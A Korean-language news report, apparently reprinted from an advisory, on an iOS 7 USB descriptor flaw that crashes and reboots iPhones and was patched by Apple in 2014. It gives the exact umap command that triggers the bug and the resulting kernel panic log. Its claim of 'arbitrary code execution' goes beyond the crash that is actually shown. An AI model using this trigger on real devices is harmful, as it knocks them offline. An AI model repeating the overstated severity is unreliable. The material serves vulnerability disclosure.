iOS 7의 결함으로 인해 커널 모드에서 임의 코드 실행이 가능해져 iPhone이 재부팅됨, Apple이 수정 사항 발표

모든 시선이 iOS 8의 미래 출시로 향하고 있는 가운데, 한 보안 연구자가 iPhone, iPad 및 iPod Touch 장치에서 실행 중인 현재 운영 체제에서 높은 위험의 결함을 발견했습니다. 보안 연구원 Andy Davis가 제출한 개념 증명에 따르면, 그는 iOS 7에서 커널 모드에서 높은 위험의 임의 코드 실행을 가능하게 하는 결함을 발견했습니다. 이 코드가 실행되면 iOS 장치의 커널이 패닉 상태에 빠지고 재부팅됩니다.

Andy는 2013년 9월 26일 Apple Inc에 개념 증명을 제출했으며, 결국 2014년 3월 10일 Apple은 이 결함을 완화하기 위한 패치를 발표했습니다. 전체 코드는 Github에서 확인할 수 있습니다. 실행에 대한 간략한 세부 사항은 아래에 나와 있습니다 :

Vulnerability Description

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

USB Endpoint 설명자에 특정 값이 제공될 때

Apple 장치의 커널이 패닉 상태에 빠지고 재부팅됩니다

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Technical Details

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

버그는 umap (https://github.com/nccgroup/umap)를 사용하여 다음과 같이 트리거할 수 있습니다:

sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

bMaxPacketSize = 0xff

Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951

CrashReporter Key: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b

Hardware Model: iPhone3,1

Date/Time: 2013-09-26 12:35:46.892 +0100

OS Version: iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,

fault_addr=0x28

r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe

r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78

r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001

r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8

cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

Debugger message: panic

OS version: 11A465

Kernel version: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;

root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X

iBoot version: iBoot-1940.1.75

secure boot?: YES

Paniclog version: 1

Kernel slide: 0x0000000008200000

Kernel text base: 0x88201000

Epoch Time: sec usec

Boot : 0x52441b69 0x00000000

Sleep : 0x00000000 0x00000000

Wake : 0x00000000 0x00000000

Calendar: 0x52441bb5 0x00056497 Panicked task 0x896f8d48: 12856 pages, 114 threads: pid 0: kernel_task
panicked thread: 0x8023de90, backtrace: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000

Apple은 이 결함에 대해 참조 번호 600217059를 부여하고 취약성을 완화하기 위한 패치를 발표했으며, 여기에서 다운로드할 수 있습니다.

자료 출처: CXSECURITY